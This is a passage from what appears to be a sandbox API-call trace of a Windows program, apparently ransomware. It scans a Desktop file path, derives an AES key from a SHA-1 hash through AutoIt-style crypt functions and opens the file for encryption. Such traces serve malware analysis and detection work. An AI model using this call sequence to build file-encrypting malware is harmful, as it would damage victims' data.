HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ORvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RvAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vAJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.188] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AJyb.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.188] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.188] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.188] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.189] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.189] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.189] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.189] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.189] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.189] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.189] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4c6800, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0x43841660, ftLastAccessTime.dwHighDateTime=0x1d5c516, ftLastWriteTime.dwLowDateTime=0x43841660, ftLastWriteTime.dwHighDateTime=0x1d5c516, nFileSizeHigh=0x0, nFileSizeLow=0x2639, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="ORvAJyb.ots", cAlternateFileName="")) returned 0x7c2100 [0030.189] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.189] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.189] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.189] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.189] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.189] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.189] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.189] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.189] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.189] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.190] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.190] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.190] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.190] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.190] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.190] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.191] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.191] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.191] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.191] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.191] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.191] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.191] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.191] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.192] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.192] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.192] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.192] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.192] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.192] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.192] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.192] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.192] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.192] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.193] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.193] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.193] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.193] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0030.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.193] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.193] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.194] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.194] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.194] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.194] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.194] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.194] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.194] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0030.194] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.194] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ORvAJyb.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\orvajyb.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.195] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.195] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.195] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.195] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.195] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.195] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.195] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.196] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.196] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 